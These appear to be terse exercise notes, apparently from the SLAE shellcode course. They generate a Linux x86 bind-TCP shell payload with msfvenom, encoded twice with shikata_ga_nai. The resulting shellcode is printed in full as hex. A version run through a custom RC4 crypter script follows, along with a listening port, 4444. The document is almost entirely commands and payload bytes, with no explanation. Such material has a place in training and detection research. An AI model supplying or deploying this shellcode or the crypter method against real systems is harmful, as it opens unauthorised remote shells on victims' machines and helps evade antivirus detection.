msfvenom --payload linux/x86/shell/bind_tcp --encoder x86/shikata_ga_nai -i 2 R | hexdump -v -e '"\\\x" 1/1 "%02x"' > shellcode.txt; grep -ic '00' shellcode.txt
./rc4-crypter.sh -k slae -s shellcode.txt > shellcode_rc4.txt | grep -ic '00' shellcode_rc4.txt

msfvenom -p linux/x86/shell_bind_tcp -e x86/shikata_ga_nai -i 2 R | hexdump -v -e '"\\\x" 1/1 "%02x"'

\xbd\xd5\x88\x78\x21\xda\xdb\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x1b\x31\x6f\x13\x83\xef\xfc\x03\x6f\xda\x6a\x8d\x9e\xb7\x36\x34\x71\xec\x15\x11\x05\x36\x6e\xfa\xd5\xff\x3f\xef\x28\x87\x2b\x13\x33\x63\xd7\xfb\x3f\x3a\x7e\x90\xf4\xfe\x30\xb8\x23\x81\x6e\xa5\x13\xe3\x9f\xad\xa6\xfb\xaa\xba\x01\x73\x04\x63\xeb\x97\x9c\xdb\xcd\x63\x8e\x7d\xfd\x19\x55\x29\xa5\xce\x10\xb0\xb3\x17\xe8\x38\x29\xb0\x5e\x23\x12\x94\x11\xb5\x41\xb6\xdf\xfb\x42\x58\x59\x17\xde\x12\x8c\xd0\x38\x34\xaf\xd9\xc5\x4f\x0f\xd5\x54\x48\x63\xa0\x1d\x41\x1b\xb9\xd8

./rc4-crypter.sh -k slae -s shellcode.txt

\x4c\x56\xd7\x40\x24\x07\x3d\x82\xfc\x0d\xe7\x25\x19\x48\x3d\xec\x28\x93\xd4\x25\x96\x98\x5b\xd6\xf3\xef\x53\x70\x7c\xa8\x79\x39\x05\x4d\x11\x6c\x31\x58\xc8\xdc\x07\x5c\x49\x42\xa1\x8c\x1a\xb7\x01\xb1\xcf\x7a\xc0\x9d\x73\x46\xe8\x98\x36\x89\xaf\xda\x3d\x28\x86\x84\xde\xd9\x67\xd8\xf6\x18\x02\xb8\xde\x2a\xb4\x02\x0e\x90\x3f\xfc\xfb\x33\x9e\x43\x21\x6d\xc8\xc6\x71\x04\xa4\x49\xec\xe5\xe6\x29\x65\x79\xaa\xe0\x5e\x54\x52\xc6\x55\xf3\x29\x18\x73\x49\xd0\xa3\x58\x35\xa4\xa9\x5d\x97\xce\x27\x40\xb5\x11\x0c\x26\x70\x7d\x1e\xb1\x4a

port 4444
